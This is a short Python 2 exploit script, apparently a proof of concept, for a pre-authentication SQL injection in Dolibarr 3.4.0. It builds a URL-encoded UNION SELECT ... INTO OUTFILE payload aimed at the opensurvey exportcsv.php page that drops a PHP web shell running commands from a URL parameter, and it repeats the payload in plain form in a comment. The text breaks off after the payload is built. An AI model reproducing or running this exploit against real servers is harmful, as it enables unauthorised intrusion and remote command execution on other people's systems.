import urllib2
import string
import random
from argparse import ArgumentParser
""" Preauth web shell via SQL injection
Dolibarr 3.4.0
"""
def run(options):
""" run exploit
"""
print '[!] Dropping web shell on %s...' % options.ip
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
sqli = 'http://{0}{1}/htdocs/opensurvey/public/exportcsv.php?sondage='\
.format(options.ip, options.rootp)
# ' UNION SELECT '<?php system($_GET['cmd'])?>,2,3,[..]13 INTO OUTFILE 'yourshell';-- -
exploit = '\'%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\''\
',2,3,4,5,6,7,8,9,10,11,12,13%20INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'\
.format(options.path, shell)